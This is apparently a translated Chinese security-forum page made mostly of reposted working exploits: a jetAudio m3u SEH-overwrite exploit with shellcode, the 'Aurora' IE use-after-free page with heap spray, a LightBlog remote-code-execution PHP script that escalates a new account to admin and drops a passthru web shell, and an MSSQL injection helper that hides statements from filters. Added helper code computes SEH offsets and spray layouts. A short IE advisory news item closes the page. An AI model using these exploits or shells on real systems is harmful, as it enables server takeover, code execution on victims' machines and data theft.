
For various reasons, 非安全中国网 is carrying out a secret plan. Please stay tuned.

To find out what happens next, keep following...

 


非安全中国网 disclaimer: 1. All statements and images in this post are solely the personal opinion of the poster and have nothing to do with the position of this site;
2. This topic was posted by 無情; the poster 無情 complies with the six management rules of the "Copyright and Disclaimer" and enjoys the related rights;
3. Other organisations or individuals must obtain the consent of the poster 無情 and of this site before using, reposting or quoting this post;
4. Parts of this post are reposted from other media and published on this site in order to convey more information; this does not mean that the site agrees with their views or is responsible for their accuracy;
5. If this post infringes the copyright of your site or of you personally, please notify this site immediately; it will be removed promptly, with our deepest apologies;
6. Site administrators and moderators may delete this post without prior notice to the poster.

What are the "various reasons"?

Asking for an explanation...

jetAudio 7.x (m3u File) Local SEH Overwrite Exploit
#!/usr/bin/python
# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Just for fun  ;) #
#
from struct import pack

# Playlist skeleton; the over-long entry after "http://" overflows a stack buffer
# and overwrites the SEH record.
m3u = b"#EXTM3U\nhttp://%s"

# Windows Execute Command (calc), encoded (metasploit.com); same bytes as the original,
# restored to \x notation after the forum stripped the backslashes.
shellcode = (
    b"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
    b"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
    b"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
    b"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
    b"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
    b"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
    b"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
    b"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
    b"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
    b"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2"
)

NEXT_SEH_RECORD = 0x909006EB  # EB 06 90 90: JMP SHORT +0x06, jumps over the handler address
SE_HANDLER = 0x7CEA61F7       # POP POP RET (SHELL32.DLL / 2k SP4 Polish)

buf = b"CLICK ME"
buf += b"\x20" * 1009               # padding up to the SEH record
buf += pack("<L", NEXT_SEH_RECORD)  # "next" pointer, overwritten with the short jump
buf += pack("<L", SE_HANDLER)       # handler pointer, overwritten with pop/pop/ret
buf += b"\x90" * 128                # NOP sled the short jump lands in
buf += shellcode

m3u %= buf
with open("evil.m3u", "wb") as fd:
    fd.write(m3u)
print("DONE")
# EoF
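Added example (my code, not h07's exploit): the two checks I would run before trusting the layout above. pattern_create and pattern_offset reproduce the Metasploit cyclic-pattern method for recovering the distance to the SEH record (the 1009 bytes above) from the dword seen in the crashed SEH chain, and check_seh_chain decodes the nSEH dword to confirm the short jump skips the handler address and lands on the NOP sled. The buffer it checks is rebuilt inline with the same layout as the exploit (constructed input; 0xCC stands in for the shellcode).

```python
# Added example, not part of h07's exploit: offset finding and an SEH-chain sanity check
# for the m3u layout above. Runs offline on a buffer rebuilt inline (constructed input).
import string
from struct import pack


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...): every 4-byte window is unique
    for the first 20280 bytes, so a dword pulled from a crash maps to one offset."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(dword, length):
    """Offset of a 32-bit little-endian value (as read from the SEH chain or a
    register in the debugger) inside a pattern of `length` bytes, or -1."""
    needle = pack("<L", dword).decode("latin-1")
    return pattern_create(length).find(needle)


def check_seh_chain(buf, nseh_off):
    """Decode the nSEH dword at `nseh_off` and report where the short jump lands.
    nSEH = EB 06 90 90: JMP SHORT +6 skips the two NOPs and the 4-byte handler address."""
    nseh = buf[nseh_off:nseh_off + 4]
    handler = buf[nseh_off + 4:nseh_off + 8]
    info = {
        "nseh": nseh,
        "handler": int.from_bytes(handler, "little"),
        "jump_target": None,
        "lands_in_sled": False,
    }
    if len(nseh) == 4 and nseh[0] == 0xEB:          # JMP rel8
        disp = int.from_bytes(nseh[1:2], "little", signed=True)
        target = nseh_off + 2 + disp                   # rel8 is relative to the next instruction
        info["jump_target"] = target
        info["lands_in_sled"] = buf[target:target + 4] == b"\x90" * 4
    return info


def example_buffer(nseh=0x909006EB, handler=0x7CEA61F7):
    """Same layout as the exploit: 8-byte title, 1009 bytes of padding, nSEH, SEH,
    NOP sled, payload (0xCC stands in for the shellcode here)."""
    buf = b"CLICK ME" + b"\x20" * 1009
    buf += pack("<L", nseh) + pack("<L", handler)
    buf += b"\x90" * 128 + b"\xcc" * 16
    return buf


SEH_OFFSET = len(b"CLICK ME") + 1009   # 1017: where the nSEH dword starts


if __name__ == "__main__":
    # Finding the offset: fuzz with a pattern, then read the nSEH dword from the crash.
    # 0x41336141 is the dword a debugger would show for offset 9 (constructed value).
    print("offset of 0x41336141:", pattern_offset(0x41336141, 2000))
    print(check_seh_chain(example_buffer(), SEH_OFFSET))
```

The jump target is computed from the end of the 2-byte JMP, so EB 06 at offset 1017 lands at 1017 + 2 + 6 = 1025, exactly where the sled begins; a different handler size or an extra padding byte would show up here as lands_in_sled being False before anything is run in the player.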
Notice: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.


Aurora exploit leaked; suspected to be the code used in the attack on Google
The "Aurora" code: This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that led to the compromise of a number of high-profile companies.

<html>
<head>
<script>
var var_comment = "COMMENT";
var var_x1 = new Array();
// 200 comment nodes whose data is later rewritten to reoccupy the freed element
for (i = 0; i < 200; i++) {
    var_x1[i] = document.createElement(var_comment);
    var_x1[i].data = "var_abc";
};
var var_e1 = null;
var var_memory = new Array();

function var_boom() {
    var var_shellcode = unescape('%u4b27%u9bd6%u96d6%ufd98%u9343%u924f%u93d6%uf94e%u4892%u4293%ud6f9%u4f4e%uf892%uf8d6%ufd9b%u9791%u2ffc%u374e%u9392%u469f%u4f49%u4b3f%u9b4a%u2f93%u3f4a%u914f%ufd37%u9f92%u4e46%uf991%u9197%u9f98%u464f%u9642%u4248%u27fc%u4627%u9946%uf993%ufd48%u4ff9%u9bf9%ud693%u97fc%u4291%u9737%u4149%u4092%u9f4e%u969b%u994a%u41fc%u4e37%u9043%u9048%u9f4f%u9f9b%u4342%ud64b%u4740%u9bfc%u4a48%u3f3f%u41f5%ufd41%u974e%u4b98%u3ffc%u2796%u2727%u9227%u4347%u414a%ud6f9%u994f%u414a%u9890%u9092%u3ff9%u4ef5%u9b96%uf543%u4398%u4b9b%u404a%ufc96%u4993%u9649%u4296%u924a%u4f98%ufd3f%u40f5%uf990%u4f96%u4bfc%u3f40%u9093%u9f4b%u374a%u90d6%ud6fc%u4b93%u9847%u4148%u3f93%u9997%uf999%u90fd%ufcf8%uf849%u4249%u9046%u4997%uf548%u3f98%ud649%u4a97%u9b37%u40f5%u92fc%u9348%u3740%u9b97%u4e41%u9743%u9099%u3742%u9090%u4697%u9242%u4e46%u9ffc%u40fc%u9798%u9149%u993f%u4342%u464e%u4742%u9027%u4896%u4b27%u4096%uf94b%u9f4e%u9627%u3ff5%uf541%u49fc%uf547%u48d6%u4242%u4642%uf9fd%u994f%ufdd6%u3f43%u422f%u4142%ufc9b%u9327%u4a43%u2749%u4af8%u4b93%ud637%u92fd%u4e9f%u4b97%uf59f%u472f%u4b92%u4a48%uf927%u993f%u404f%u98fc%u3741%u99fd%u4b42%uf543%u4ff9%u9f99%ufd9f%u984e%u9792%u2f3f%u4742%u9337%u9b9b%u4648%u4341%u4af9%u9f4e%u9890%u93fd%u3f47%u4896%ud643%u9698%uf89b%ud62f%u494f%u4f9f%u2798%u2f4e%u914a%u48f5%u4b37%u4a4e%u2ff9%u9148%u9837%u2727%u9092%u4af9%u49fd%u414f%u4e48%u3796%u4147%u2f47%u47d6%ufdd6%u2f9b%u4396%u4940%u9637%u9f90%u4240%u3746%u904b%u93f5%u2747%u4fd6%u4891%u4a9b%u4693%u9341%u4b40%u9637%u9190%u4947%u4bf5%u92fc%u47f9%u2f40%u2ffd%ufd40%u40f9%u372f%u372f%u4ff5%u2f99%u2f92%u4243%uf5f9%u4048%u9f9b%u97fc%u279f%u964e%u9f4a%ufcf9%uf596%u91d6%u99f8%uf949%uf543%u4b48%u932f%u9640%uf948%u2f2f%ufc2f%ufd43%u4993%u92fc%u3ff5%uf94a%u96f9%u9642%uf54b%u9f96%u4e4b%u4e40%u9f4f%uf998%u4b49%u999b%ufc37%ufd2f%u90d6%u4f48%u4afc%u4796%ufc3f%u3f46%u9798%u4148%u9f3f%u49f5%u4a37%ufd2f%u404b%u9b9b%u9848%u9143%u43f5%ufdf8%u493f%u48f8%u4148%u9099%u97fc%ud627%uf546%u4642%u41fd%u9b40%u93f5%u9847%u4241%u9092%u3793%u4a96%u9992%ud690%uf946%u4342%u469f%u4efc%uf991%u933f%u92f5%u9796%u4093%u93fc%u484a%u474e%u2f92%u4848%u4390%u4e43%u4a27%u409f%u939b%ufd99%u4ff5%ufd37%u4391%uf8f8%u9f27%u974f%u3f93%uf53f%u4091%u4627%u4f96%u3f96%u4b98%u9892%u4090%u4142%u9341%u9147%u999b%u4f41%u27d6%u98f9%u4392%u4746%u9640%u3797%u4b90%u914a%u924f%u999f%u9fd6%u3741%u412f%ueebf%uf983%u2ba1%ud9c9%ud9f7%u2474%u5ef4%u35b1%u7e31%u8311%ufcee%u7e03%u61e3%u200c%u313f%udc1d%u4640%uaa09%ub7be%ucdca%u5237%udffb%u1623%uefae%u7a20%u9b43%u6f64%ue9d0%u80a0%u4751%uaf96%u6962%u6316%ueba0%u7eea%ucbf5%ub0d3%u0d08%uac14%u5fe3%ubacd%u7056%ufe7a%u716a%u74ac%u09d2%u4bc9%ua3a7%u9bd0%ubf18%u039a%ue712%u353a%ufbf7%u7c06%ucf7c%u7ffd%u0154%ub1fe%uce98%u7dc1%u0e15%ub906%u65c6%ub97c%u7e7b%uc347%u0ba7%u6355%uab23%u95bd%u2ae0%u9936%u384d%ube10%ued50%uba2b%u10d9%u4afb%u3699%u17df%u5679%uf246%u672c%u5a98%ucd90%u49d3%u74c5%u07be%uf418%u61c5%u061a%uc1c5%u3773%u8e4e%uc804%uea85%u82fb%u5b87%u4a94%ude52%u6cf9%u1d89%uef04%ude3b%ueff3%udb4e%ub7b8%u91a3%u5dd1%u06c3%u77d1%uc7ad%u1d59%u7941%uf3c6%u01c4%u0c63');
    // heap spray: 0x0c0d0c0d filler doubled until the block is at least 0xd0000 code units, 150 blocks
    var var_spray = unescape("%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d");
    do { var_spray += var_spray } while (var_spray.length < 0xd0000);
    for (var_i = 0; var_i < 150; var_i++) var_memory[var_i] = var_spray + var_shellcode;
}

function var_ev1(evt) {
    var_boom();
    var_e1 = document.createEventObject(evt);           // keeps a reference to the event's source element
    document.getElementById("var_sp1").innerHTML = "";  // frees that element
    window.setInterval(var_ev2, 50);
}

function var_ev2() {
    p = "\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
    for (i = 0; i < var_x1.length; i++) { var_x1[i].data = p; }  // reoccupy the freed memory with 0x0c0d0c0d
    var t = var_e1.srcElement;                                    // use of the freed element
}
</script>
</head>
<body>
<span id="var_sp1"><img src="/a4tpCOZ3Tvar_start.gif" onload="var_ev1(event)"></span>
</body>
</html>

---- quoted from the blogger's comment ----
Is this really "Aurora"? If so, it is very disappointing. I think that for an IE 0day to have this much impact it would have to meet at least one of the following conditions: 1. It needs no JavaScript or ActiveX support, so it also hits inside Outlook (Outlook's IE control has JavaScript and ActiveX disabled). 2. It can be "pushed" directly to a remote user, the way a remote overflow can. Clearly, judging from the exploit, it is not much different from previous IE xdays. The probability of a heap spray going uncaught in an IE honeypot is practically zero; and in hit rate and applicability it is far behind the recent PDF 0day, so how could it have caused this much impact? Is it hype? Microsoft's security advisory says that enabling DEP for IE avoids the attack. So if this IE 0day really has such an impact, there should also exist attack code that does not use a heap spray

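Added example (my code, not part of the Aurora page or the exploit): the arithmetic behind the spray in var_boom() and a byte-level check of the 0x0c0d filler. It assumes the browser stores JavaScript strings as UTF-16LE, two bytes per code unit, which is true of IE's BSTRs. The point it makes is why that value was chosen: once the spray reaches 0x0c0d0c0d, a pointer read from the overwritten element is 0x0c0d0c0d, the memory it points at contains 0x0c0d0c0d again, and the bytes there decode as harmless OR instructions from any alignment, so execution slides into the shellcode at the end of whichever block is hit.

```python
# Added example, not part of the Aurora page: heap-spray arithmetic for var_boom() and a
# byte-level check of the 0x0c0d filler. Assumes UTF-16LE string storage (IE BSTRs).

SPRAY_SEED = "\u0c0d\u0c0d"           # unescape("%u0c0d%u0c0d")
SPRAY_MIN_CHARS = 0xd0000
SPRAY_BLOCKS = 150


def spray_block_chars(min_chars=SPRAY_MIN_CHARS, seed=SPRAY_SEED):
    """Length the doubling loop reaches: do { s += s } while (s.length < min_chars)."""
    s = seed
    while len(s) < min_chars:
        s += s
    return len(s)


def spray_block_bytes(min_chars=SPRAY_MIN_CHARS, shellcode_chars=0):
    """Bytes one spray string occupies: 2 bytes per UTF-16 code unit."""
    return (spray_block_chars(min_chars) + shellcode_chars) * 2


def total_spray_bytes(blocks=SPRAY_BLOCKS, min_chars=SPRAY_MIN_CHARS, shellcode_chars=0):
    """Memory the 150 spray strings occupy; the spray must reach 0x0c0d0c0d to work."""
    return blocks * spray_block_bytes(min_chars, shellcode_chars)


def sled_bytes(code_units):
    """In-memory bytes of a run of U+0C0D: 0d 0c 0d 0c ...; read as a dword this is 0x0c0d0c0d."""
    return ("\u0c0d" * code_units).encode("utf-16-le")


def decode_or_sled(data, start=0):
    """Instruction lengths when x86 decodes the filler from `start`:
    0x0c = OR AL,imm8 (2 bytes), 0x0d = OR EAX,imm32 (5 bytes). Stops at any other opcode."""
    lengths, i = [], start
    while i < len(data):
        size = {0x0c: 2, 0x0d: 5}.get(data[i], 0)
        if size == 0 or i + size > len(data):
            break
        lengths.append(size)
        i += size
    return lengths


def sled_decodes_cleanly(data, start):
    """True if decoding from `start` only stops because fewer than 5 bytes remain."""
    consumed = start + sum(decode_or_sled(data, start))
    return len(data) - consumed < 5


if __name__ == "__main__":
    print("code units per block:", hex(spray_block_chars()))
    print("bytes per block:", hex(spray_block_bytes()))
    print("total spray:", total_spray_bytes() // (1024 * 1024), "MiB")
    sled = sled_bytes(64)
    print([decode_or_sled(sled, s)[:3] for s in range(4)])
```

The doubling loop overshoots 0xd0000 to 0x100000 code units, so each of the 150 strings is 2 MiB plus the shellcode, about 300 MiB in total; that size, not the trigger itself, is what made this payload easy to spot in a honeypot, which is the objection the blogger raises above.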

MSSQL manual-injection helper for locating the web directory
Mainly used to find the web root while injecting by hand; it can also encode the statements for you. Features: 1. read the website directory from the registry; 2. enumerate directories to narrow it down; 3. locate the directory by searching for files; 4. plant a trojan through the database; 5. the encoders commonly needed for injection.
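Added example (my code, not the tool from the post): the statements behind features 1, 2 and 5 written out in plain Python, so each payload can be read before it is pasted into an injection point. The registry path is the standard key where IIS 5/6 kept its virtual-root mapping, xp_regread and xp_dirtree are the stock extended procedures, and the stacked-query injection-point format in build_injection is an assumption about the target parameter; feature 4 is not covered.

```python
# Added example, not the tool from the post: directory discovery and payload encoding
# for MSSQL manual injection. Injection-point format is an assumption.
import urllib.parse

# HKLM key where IIS 5/6 stored the mapping of virtual roots to on-disk paths.
IIS_VROOTS_KEY = r"SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"


def stmt_read_iis_root(vroot="/"):
    """xp_regread of the IIS virtual-root value; the returned row holds the web directory."""
    return ("exec master..xp_regread 'HKEY_LOCAL_MACHINE',"
            f"'{IIS_VROOTS_KEY}','{vroot}'")


def stmt_dirtree(path, depth=1):
    """xp_dirtree <path>,<depth>,1 lists subdirectories and (3rd arg = 1) files."""
    return f"exec master..xp_dirtree '{path}',{depth},1"


def to_hex_literal(stmt):
    """T-SQL 0x... literal of an ASCII statement (non-ASCII text would need nvarchar)."""
    return "0x" + stmt.encode("ascii").hex()


def wrap_exec_hex(stmt):
    """Run a statement from its hex form so no quotes or keywords appear in the request."""
    return ("declare @s varchar(4000);"
            f"set @s=cast({to_hex_literal(stmt)} as varchar(4000));exec(@s)")


def to_char_concat(text):
    """char(119)+char(119)... form, for places where a quoted string literal is filtered."""
    return "+".join(f"char({ord(c)})" for c in text)


def url_encode(payload):
    """Percent-encode everything but unreserved characters, for use in a query string."""
    return urllib.parse.quote(payload, safe="")


def build_injection(param, value, stmt):
    """Stacked-query payload for a numeric parameter: param=value;<stmt>-- (assumed format)."""
    return f"{param}={url_encode(value)};{url_encode(wrap_exec_hex(stmt))}--"


if __name__ == "__main__":
    for s in (stmt_read_iis_root(), stmt_dirtree(r"c:\inetpub\wwwroot")):
        print(s)
        print(wrap_exec_hex(s))
        print(build_injection("id", "1", s))
    print(to_char_concat("wwwroot"))
```

Both extended procedures need sysadmin (or explicit grants) on the database login, which is why finding the web root by registry read only works when the application connects as sa; the hex wrapper does not change that, it only hides the statement text from simple keyword filters.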

LightBlog 8.4.1.1 Remote Code Execution Vulnerability
Install php.exe and run the script from CMD. What it does, step by step: registers a user, promotes it to admin with a POST to cp_memberedit.php that is sent without any session cookie, uploads a PHP file through the image field of main.php as that admin, then requests the uploaded file, which writes a command shell into images/ and runs the command given on the command line.
The PHP exploit follows; save it as *.php:
#!/usr/bin/php -q -d short_open_tag=on
<?php
echo "LightBlog 8.4.1.1 Remote Code Execution Exploit\r\n";
echo "by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>\r\n";
echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n";

if ($argc < 3) {
    echo "Usage: php " . $argv[0] . " Host Path [Cmd]\r\n";
    echo "Host:          target server (ip/hostname)\r\n";
    echo "Path:          path of lightblog\r\n";
    echo "Example:\r\n";
    echo "php " . $argv[0] . " localhost /lightblog/ dir\r\n";
    die;
}

error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 5);

// hex + ascii dump of a response, for debugging (from rgod's template)
function quick_dump($string) {
    $result = ''; $exa = ''; $cont = 0;
    for ($i = 0; $i <= strlen($string) - 1; $i++) {
        if ((ord($string[$i]) <= 32) | (ord($string[$i]) > 126)) { $result .= "  ."; }
        else { $result .= "  " . $string[$i]; }
        if (strlen(dechex(ord($string[$i]))) == 2) { $exa .= " " . dechex(ord($string[$i])); }
        else { $exa .= " 0" . dechex(ord($string[$i])); }
        $cont++;
        if ($cont == 15) { $cont = 0; $result .= "\r\n"; $exa .= "\r\n"; }
    }
    return $exa . "\r\n" . $result;
}

$proxy_regex = '(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5})';

// send one raw HTTP request (directly or through $proxy) and leave the response in $html
function sendpacketii($packet) {
    global $proxy, $host, $port, $html, $proxy_regex;
    if ($proxy == '') {
        $ock = fsockopen(gethostbyname($host), $port);
        if (!$ock) { echo 'No response from ' . $host . ':' . $port; die; }
    } else {
        $c = preg_match($proxy_regex, $proxy);
        if (!$c) { echo 'Not a valid proxy...'; die; }
        $parts = explode(':', $proxy);
        echo "Connecting to " . $parts[0] . ":" . $parts[1] . " proxy...\r\n";
        $ock = fsockopen($parts[0], $parts[1]);
        if (!$ock) { echo 'No response from proxy...'; die; }
    }
    fputs($ock, $packet);
    if ($proxy == '') {
        $html = '';
        while (!feof($ock)) { $html .= fgets($ock); }
    } else {
        $html = '';
        // eregi() no longer exists in PHP 7+; strpos() does the same end-of-headers test
        while ((!feof($ock)) or (strpos($html, "\r\n\r\n") === false)) {
            $html .= fread($ock, 1);
        }
    }
    fclose($ock);
}

$host = $argv[1];
$path = $argv[2];
$cmd = "";
for ($i = 3; $i <= $argc - 1; $i++) { $cmd .= " " . $argv[$i]; }
$cmd = urlencode($cmd);
$port = 80;
$proxy = "";
if (($path[0] <> '/') or ($path[strlen($path) - 1] <> '/')) { echo 'Error... check the path!'; die; }
if ($proxy == '') { $p = $path; } else { $p = 'http://' . $host . ':' . $port . $path; }

echo "Step 0 - If Shell already exists, run it..\r\n";
$packet  = "GET " . $p . "images/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html, "666999")) {
    echo "Exploit succeeded...\r\n";
    $temp = explode("666999", $html);
    die("\r\n" . $temp[1] . "\r\n");
}

echo 'Step 1 - Creating New User (Name: Piggy_Marty Pwd: DAFORNO_IMPERAT)..';
// Retrieving the "confirmation" code
$packet  = "GET " . $p . "register.php HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
preg_match('#<b>([a-zA-Z0-9]+?)</b><input name="rand" type="hidden" value="([a-zA-Z0-9]+?)" />#is', $html, $fuori);
$conf_code = $fuori[1];
$rand_code = $fuori[2];
// Doing the registration
$data = "rand=$rand_code&val=$conf_code&username_post=Piggy_Marty&pwd1_post=DAFORNO_IMPERAT&pwd2_post=DAFORNO_IMPERAT&name_post=Piggy_Marty&email_post=hawkgotyou@gmail.com";
$packet  = "POST " . $p . "register.php HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Accept-Language: it\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept-Encoding: gzip, deflate\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Cache-Control: no-cache\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
sleep(1);

echo 'Step 2 - Promoting Piggy_Marty to admin level..';
// no session cookie is sent here: cp_memberedit.php does not check who is asking
$data = "type_post=admin&username_post=Piggy_Marty";
$packet  = "POST " . $p . "cp_memberedit.php HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Accept-Language: it\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Accept-Encoding: gzip, deflate\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Cache-Control: no-cache\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
sleep(1);

echo 'Step 3 - Uploading Shell Creator..';
// Uploaded as the "image" of a new post; when requested it writes piggy_marty.php next to itself.
// The dropped shell prints 666999 around the command output so Step 5 can cut it out.
$creator = <<<'PHPCODE'
<?php $fp=fopen('piggy_marty.php','w');fputs($fp,'<?php error_reporting(0);set_time_limit(0);if (function_exists(\'get_magic_quotes_gpc\') && get_magic_quotes_gpc()) {$_GET[\'cmd\']=stripslashes($_GET[\'cmd\']);}echo 666999;passthru($_GET[\'cmd\']);echo 666999;?>');fclose($fp);chmod('piggy_marty.php',0777);?>
PHPCODE;
$data  = "-----------------------------7d529a1d23092a\r\n";
$data .= "Content-Disposition: form-data; name=\"image\"; filename=\"piggy_marty_creator.php\"\r\n";
$data .= "Content-Type:\r\n\r\n";
$data .= $creator . "\r\n";
$data .= "-----------------------------7d529a1d23092a\r\n";
$data .= "Content-Disposition: form-data; name=\"title\"\r\n\r\n";
$data .= "Not so good if you see this..\r\n";
$data .= "-----------------------------7d529a1d23092a\r\n";
$data .= "Content-Disposition: form-data; name=\"post\"\r\n\r\n";
$data .= "An Exploit has attacked your site.. contact hawkgotyou@gmail.com for more details\r\n";
$data .= "-----------------------------7d529a1d23092a--\r\n";
$packet  = "POST " . $p . "main.php HTTP/1.0\r\n";
$packet .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet .= "Referer: http://" . $host . $path . "/\r\n";
$packet .= "Cookie: Lightblog_username=Piggy_Marty&Lightblog_password=DAFORNO_IMPERAT\r\n";
$packet .= "Accept-Language: it\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet .= "Accept-Encoding: gzip, deflate\r\n";
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Content-Length: " . strlen($data) . "\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Cache-Control: no-cache\r\n\r\n";
$packet .= $data;
sendpacketii($packet);
sleep(1);

echo 'Step 4 - Executing Creator..';
$packet  = "GET " . $p . "images/piggy_marty_creator.php HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);

echo "Step 5 - Execute Commands..\r\n";
$packet  = "GET " . $p . "images/piggy_marty.php?cmd=$cmd HTTP/1.0\r\n";
$packet .= "Host: " . $host . "\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
if (strstr($html, "666999")) {
    echo "Exploit succeeded...\r\n";
    $temp = explode("666999", $html);
    die("\r\n" . $temp[1] . "\r\n");
}
# Coded With BH Fast Generator v0.1
?>

Microsoft issues a new IE7 security advisory; Vista is not affected
Microsoft today issued a security advisory for current versions of the IE browser. The newly found IE vulnerability affects Windows XP, Server 2003 and Windows 2000, but Vista is not affected. Versions earlier than IE 6.0 are also affected; the cases found so far are mainly XP/2000/Server 2003 systems running the current IE7. In a post on its security blog, Microsoft said that a security risk can arise when Windows handles specially crafted URLs or URIs. IE7 updated a Windows component and changed how IE and the Windows Shell communicate when handling URLs or URIs; when an application passes an unvalidated URL or URI to Windows, the flaw can be exploited to carry out a malicious attack.
A successful attack has one prerequisite: the user must activate an unvalidated, specially crafted URL or URI, for example by clicking a link in an e-mail, which may cause malicious code to be triggered and run.
The only advice Microsoft offers is to keep the firewall on and keep systems up to date, which suggests Microsoft may release a patch outside its regular monthly Patch Tuesday.